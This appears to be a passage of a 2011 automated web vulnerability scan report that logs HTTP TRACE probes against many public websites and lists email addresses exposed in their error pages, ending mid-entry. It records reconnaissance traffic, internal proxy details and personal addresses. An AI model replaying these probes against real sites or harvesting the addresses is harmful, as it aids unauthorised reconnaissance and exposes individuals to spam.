Host:   http://www.weather.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.weather.com
Cookie: 154b5158c028b571

Response

HTTP/1.1 200 OK
Server: Footprint 4.6/FPMCP
Mime-Version: 1.0
Date: Sat, 02 Apr 2011 12:37:29 GMT
Content-Type: message/http
Content-Length: 105
Expires: Sat, 02 Apr 2011 12:37:29 GMT
Connection: close

TRACE / HTTP/1.0
Host: www.weather.com
Cookie: 154b5158c028b571
_FP_X_URL: http://www.weather.com/

21.257. http://www.weather.gov/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.weather.gov
Path:   /

Request

TRACE / HTTP/1.0
Host: www.weather.gov
Cookie: 3608eaf25677bf52

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 13:29:41 GMT
Content-Type: message/http
Server: Apache
Via: 1.1 nws-hq-cache03 (NetCache NetApp/6.0.7)

TRACE / HTTP/1.1
Host: www.weather.gov
Cookie: 3608eaf25677bf52
X-Forwarded-For: 173.193.214.243
Via: 1.0 nws-hq-cache03 (NetCache NetApp/6.0.7)

21.258. http://www.weatherbug.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.weatherbug.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.weatherbug.com
Cookie: ab3f21f7ce2f030d

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sat, 02 Apr 2011 12:44:05 GMT
P3P: CP="NOI DSP COR NID TAI STP UNI"
X-Powered-By: ASP.NET
Content-Type: message/http
Content-Length: 72

TRACE / HTTP/1.0
Host: www.weatherbug.com
Cookie: ab3f21f7ce2f030d

21.259. http://www.webring.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.webring.org
Path:   /

Request

TRACE / HTTP/1.0
Host: www.webring.org
Cookie: 3b5ff0e9cef6ced2

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:57:39 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.webring.org
Cookie: 3b5ff0e9cef6ced2

21.260. http://www.weebly.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.weebly.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.weebly.com
Cookie: c95a93806fa92813

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:36:19 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.weebly.com
Cookie: c95a93806fa92813

21.261. http://www.wendys.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wendys.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.wendys.com
Cookie: 85ef312f1efd68e1

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:21:04 GMT
Server: Apache
Connection: close
Content-Type: message/http
Set-Cookie: BIGipServerpool-x-www.wendys.com=784924426.4391.0000; path=/

TRACE / HTTP/1.0
Host: www.wendys.com
Cookie: 85ef312f1efd68e1
X-Forwarded-For: 173.193.214.243

21.262. http://www.wikimedia.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wikimedia.org
Path:   /

Request

TRACE / HTTP/1.0
Host: www.wikimedia.org
Cookie: 3ef0004212ec6ed

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 13:31:45 GMT
Server: Apache
Content-Type: message/http
X-Cache: MISS from sq61.wikimedia.org
X-Cache-Lookup: NONE from sq61.wikimedia.org:3128
X-Cache: MISS from sq36.wikimedia.org
X-Cache-Lookup: NONE from sq36.wikimedia.org:80
Connection: close

TRACE / HTTP/1.0
Host: www.wikimedia.org
Cookie: 3ef0004212ec6ed
Via: 1.0 sq61.wikimedia.org:3128 (squid/2.7.STABLE7)
X-Forwarded-For: 173.193.214.243, 208.80.152.46

21.263. http://www.wikio.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wikio.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.wikio.com
Cookie: 109d0abeebcc32bd

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:58:03 GMT
Server: Apache/2.2.3 (Debian) mod_jk/1.2.18
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.wikio.com
Cookie: 109d0abeebcc32bd

21.264. http://www.wiktionary.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wiktionary.org
Path:   /

Request

TRACE / HTTP/1.0
Host: www.wiktionary.org
Cookie: c4fba7ce14d369d0

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 13:53:33 GMT
Server: Apache
Content-Type: message/http
X-Cache: MISS from sq73.wikimedia.org
X-Cache-Lookup: NONE from sq73.wikimedia.org:3128
X-Cache: MISS from sq60.wikimedia.org
X-Cache-Lookup: NONE from sq60.wikimedia.org:80
Connection: close

TRACE / HTTP/1.0
Host: www.wiktionary.org
Cookie: c4fba7ce14d369d0
Via: 1.0 sq73.wikimedia.org:3128 (squid/2.7.STABLE7)
X-Forwarded-For: 173.193.214.243, 208.80.152.70

21.265. http://www.worthpoint.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.worthpoint.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.worthpoint.com
Cookie: a34b45b2c9f1242f

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:37:55 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.worthpoint.com
Cookie: a34b45b2c9f1242f

21.266. http://www.wowhead.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wowhead.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.wowhead.com
Cookie: f5c10bee4e0eee65

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:27 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.wowhead.com
Cookie: f5c10bee4e0eee65

21.267. http://www.wrongdiagnosis.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wrongdiagnosis.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.wrongdiagnosis.com
Cookie: 7dc81dc966ff46fd

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:31:18 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.wrongdiagnosis.com
Cookie: 7dc81dc966ff46fd

21.268. http://www.xe.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xe.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.xe.com
Cookie: 577552304ac3e72a

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:50:24 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.xe.com
Cookie: 577552304ac3e72a

21.269. http://www.yallwire.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.yallwire.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.yallwire.com
Cookie: e523649043a83c15

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:40:51 GMT
Server: Apache/2.2.16 (Unix)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.yallwire.com
Cookie: e523649043a83c15

21.270. http://www.yellow.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.yellow.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.yellow.com
Cookie: 43506e45579f1b7a

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:04:55 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.4
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.yellow.com
Cookie: 43506e45579f1b7a
Connection: Keep-Alive
X-Client-IP: 173.193.214.243
X-VIP: 174.137.114.15_80

21.271. http://www.yidio.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.yidio.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.yidio.com
Cookie: 14ac1276dd4f2388

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:40:13 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.yidio.com
Cookie: 14ac1276dd4f2388

21.272. http://www.younghollywood.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.younghollywood.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.younghollywood.com
Cookie: cfb60dead210617c

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Content-Type: message/http
Content-Length: 133
X-Varnish-IP: 192.168.100.142
Date: Sat, 02 Apr 2011 13:42:08 GMT
X-Varnish: 2005739096
Age: 0
Via: 1.1 varnish
Connection: close

TRACE / HTTP/1.0
Host: www.younghollywood.com
Cookie: cfb60dead210617c
X-Varnish: 2005739096
X-Forwarded-For: 173.193.214.243

21.273. http://www.yourdictionary.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.yourdictionary.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.yourdictionary.com
Cookie: 2ea7b2e3b372865

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:57:38 GMT
Server: Apache
Vary: Host
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.yourdictionary.com
Cookie: 2ea7b2e3b372865

21.274. http://www.yourfilehost.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.yourfilehost.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.yourfilehost.com
Cookie: d275014101bbec3

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:18 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.yourfilehost.com
Cookie: d275014101bbec3

21.275. http://www.zabasearch.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zabasearch.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.zabasearch.com
Cookie: 51cba6a1f53a07d3

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:00:39 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.zabasearch.com
Cookie: 51cba6a1f53a07d3

21.276. http://www.zeusclicks.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zeusclicks.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.zeusclicks.com
Cookie: 3a4298ea9b9bac4f

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:50:53 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.zeusclicks.com
Cookie: 3a4298ea9b9bac4f

21.277. http://www.zwinky.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zwinky.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.zwinky.com
Cookie: 2dbc037ca0ccb263

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:45:09 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8c DAV/2 mod_jk/1.2.28
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.zwinky.com
Cookie: 2dbc037ca0ccb263
X-Jabodo-For: 173.193.214.243

21.278. http://www.zynga.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zynga.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.zynga.com
Cookie: 2ecb8692fd30bda6

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:44:11 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.zynga.com
Cookie: 2ecb8692fd30bda6
X-Forwarded-For: 173.193.214.243

22. Email addresses disclosed  previous  next
There are 16 instances of this issue:

22.1. http://www.androidcentral.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.androidcentral.com
Path:   /favicon.ico

Issue detail

The following email addresses were disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.androidcentral.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: spe
Date: Sat, 02 Apr 2011 14:06:31 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Powered-By: PHP/5.3.5
Set-Cookie: SESSff98d42578ac6106ce5b7f80c23f307a=hr1onak19pbmm2diiqpgglrca2; expires=Mon, 25-Apr-2011 17:39:51 GMT; path=/; domain=.androidcentral.com
Last-Modified: Sat, 02 Apr 2011 14:00:10 GMT
ETag: "acfc4415a958e438545290ed1f077f57"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Content-Length: 367789

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>Home |
...[SNIP]...
<a
href="javascript:location.href='mailto:'+String.fromCharCode(112,104,105,108,64,97,110,100,114,111,105,100,99,101,110,116,114,97,108,46,99,111,109)+'?'">phil@androidcentral.com</a>
...[SNIP]...
<a
href="javascript:location.href='mailto:'+String.fromCharCode(106,101,114,114,121,64,97,110,100,114,111,105,100,99,101,110,116,114,97,108,46,99,111,109)+'?'">jerry@androidcentral.com</a>
...[SNIP]...
<a
href="javascript:location.href='mailto:'+String.fromCharCode(99,104,114,105,115,64,97,110,100,114,111,105,100,99,101,110,116,114,97,108,46,99,111,109)+'?'">chris@androidcentral.com</a>
...[SNIP]...
<a
href="javascript:location.href='mailto:'+String.fromCharCode(99,111,114,121,64,97,110,100,114,111,105,100,99,101,110,116,114,97,108,46,99,111,109)+'?'">cory@androidcentral.com</a>
...[SNIP]...
22.2. http://www.bookrags.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bookrags.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bookrags.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Connection: close
Pragma: no-cache
Content-Length: 1099

<html>
<head>
<title>Request Rejected</title>
</head>
<body>We apologize for any inconvenience.<br><br>
The URL (web address) you requested returned an error in our system.<br>
Please
...[SNIP]...
<a href="mailto:customerservice@bookrags.com?subject=support ID is: 12810563297334068488">
...[SNIP]...
22.3. http://www.kcom.com/contact-us/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kcom.com
Path:   /contact-us/

Issue detail

The following email address was disclosed in the response:

Request

GET /contact-us/ HTTP/1.1
Host: www.kcom.com
Proxy-Connection: keep-alive
Referer: http://www.kcom.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=986389016; __utmz=90957184.1301752662.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); exp_last_activity=1301749027; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; __utma=90957184.848604376.1301752662.1301752662.1301752662.1; __utmc=90957184; __utmb=90957184.3.9.1301752673281

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:57:10 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1301749030; expires=Sun, 01-Apr-2012 13:57:10 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A12%3A%22%2Fcontact-us%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat, 02 Apr 2011 13:57:11 GMT
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 12291

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<META HTTP-EQUIV="Content-t
...[SNIP]...
<input type="hidden" name="debugEmail" value="zoe.keeping@kcom.com">
...[SNIP]...
22.4. http://www.kcom.com/contact-us/brighton  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kcom.com
Path:   /contact-us/brighton

Issue detail

The following email address was disclosed in the response:

Request

GET /contact-us/brighton HTTP/1.1
Host: www.kcom.com
Proxy-Connection: keep-alive
Referer: http://www.kcom.com/contact-us/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=986389016; __utmz=90957184.1301752662.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); exp_last_activity=1301749029; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A12%3A%22%2Fcontact-us%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; __utma=90957184.848604376.1301752662.1301752662.1301752662.1; __utmc=90957184; __utmb=90957184.4.9.1301752673281

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:57:20 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1301749040; expires=Sun, 01-Apr-2012 13:57:20 GMT; path=/
Set-Cookie: exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A21%3A%22%2Fcontact-us%2Fbrighton%2F%22%3Bi%3A1%3Bs%3A12%3A%22%2Fcontact-us%2F%22%3Bi%3A2%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat, 02 Apr 2011 13:57:21 GMT
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 9945

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<META HTTP-EQUIV="Content-t
...[SNIP]...
<a onclick="pageTracker._trackTrans()" href="mailto:me@kcom.com">me@kcom.com</a>
...[SNIP]...
<a onclick="pageTracker._trackTrans()" href="mailto:me@kcom.com">me@kcom.com</a>
...[SNIP]...
= _gat._getTracker("UA-11562191-1");
orderNum = getOrderID();
pageTracker._addTrans(
orderNum,
"",
"10",
"",
"",
"",
"",
""
);
pageTracker._addItem(
orderNum,
"me@kcom.com",
"Email Link",
"General enquiries",
"10",
"1"
);
} catch(err) {}</script>
...[SNIP]...
22.5. http://www.livevideo.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.livevideo.com
Path:   /favicon.ico

Issue detail

The following email addresses were disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.livevideo.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 503 Service Temporarily Unavailable
Date: Sat, 02 Apr 2011 14:04:44 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=q58e2q8qs5alfuj8eu827ing04; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 503 Service Temporarily Unavailable
Retry-After: 7200
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25139


<font face=arial size=2>
<table border=0 cellspacing=0 cellpadding=0 width=750 align=center><tr><td>
<center><br><img src="/live-video.gif"><br><br>

<table border=0 cellspacing=0 cellpadding=20 widt
...[SNIP]...
<robert@SCAPALAW.COM>
...[SNIP]...
<br />
From: rob@scapalaw.com<br />
...[SNIP]...
<br />
Reply-To: rob@scapalaw.com<br />
...[SNIP]...
<br />
To: rob@scapalaw.com (QUADRANET)<br />
...[SNIP]...
<milan@quadranet.com>
...[SNIP]...
<br />
From: rob@scapalaw.com (QUADRANET)<br />
...[SNIP]...
<milan@quadranet.com>
...[SNIP]...
<br />
To: "Rob Scapa" robert@SCAPALAW.COM (QUADRANET)<br />
...[SNIP]...
<br />
From: "Rob Scapa" robert@SCAPALAW.COM (QUADRANET)<br />
...[SNIP]...
<br />
email: Milan@quadranet.com<br />
...[SNIP]...
22.6. http://www.menupages.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.menupages.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.menupages.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 NOT FOUND
Date: Sat, 02 Apr 2011 13:56:11 GMT
Server: Apache
Cache-Control: max-age=300
Expires: Sat, 02 Apr 2011 14:01:11 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Content-Length: 7920

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<a class="scramble" rel="feedback/menupages.com" href="mailto:feedback@menupages.com?subject=Feedback">
...[SNIP]...
22.7. http://www.mycheckfree.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mycheckfree.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mycheckfree.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:35:12 GMT
Server: Apache
Content-Length: 320
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /favicon.ico was not found on this server.</p>
<hr />
...[SNIP]...
<a href="mailto:info@checkfree.com">
...[SNIP]...
22.8. http://www.myrecipes.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myrecipes.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.myrecipes.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:43:13 GMT
Server: Apache
ETag: "437b78-39-49e76a4611d00"
Accept-Ranges: bytes
Content-Type: text/html
Vary: X-Catmap-Header
P3P: CP='PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE CUR ADMa DEVa TAIo PSAo PSDo IVAo IVDo CONo TELo OTPi OUR UNRo PUBi O TRo IND DSP CAO COR', CP='PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE CUR ADMa DEVa TAIo PSAo PSDo IVAo IVDo CONo TELo OTPi OUR UNRo PUBi O TRo IND DSP CAO COR'
Content-Length: 24220

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <title>Page Not Found |
...[SNIP]...
<a href="mailto:contactus@myrecipes.com?subject=Report an Error">
...[SNIP]...
22.9. http://www.opentable.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.opentable.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3024000
Content-Length: 1150
Content-Type: image/x-icon
Last-Modified: Tue, 15 Mar 2011 18:49:22 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-07
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:19-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Sat, 02 Apr 2011 13:45:16 GMT

............ .h.......(....... ..... .................................................................................................................................x...p...m...m...o...z.............
...[SNIP]...
22.10. http://www.realsimple.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.realsimple.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.realsimple.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:44:09 GMT
Server: Apache
ETag: "11faa34-1413-4875db8624980"
Accept-Ranges: bytes
Content-Type: text/html
Vary: X-Catmap-Header
P3P: CP='PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE CUR ADMa DEVa TAIo PSAo PSDo IVAo IVDo CONo TELo OTPi OUR UNRo PUBi OTRo IND DSP CAO COR', CP='PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE CUR ADMa DEVa TAIo PSAo PSDo IVAo IVDo CONo TELo OTPi OUR UNRo PUBi OTRo IND DSP CAO COR'
Content-Length: 36963

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>Page Not Found - Re
...[SNIP]...
<a href="mailto:realsimpleonline@customersvc.com">
...[SNIP]...
22.11. http://www.springerlink.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.springerlink.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.springerlink.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 403 Forbidden
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding
Date: Sat, 02 Apr 2011 13:45:03 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 212

<HTML><BODY><H3>403 Forbidden</H3><I>ErrorId: 0428e6a8-4d28-4d50-909e-92b57031a6ae</I><p>Please contact <a href="mailto:support@metapress.com">support@metapress.com</a> if this problem persists.</p></
...[SNIP]...
22.12. http://www.thefreedictionary.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thefreedictionary.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thefreedictionary.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Cache-Control: max-age=172800
Content-Type: image/x-icon
Last-Modified: Mon, 31 May 2010 17:29:22 GMT
Accept-Ranges: bytes
ETag: "14c7b0cee60cb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO PSA OUR"
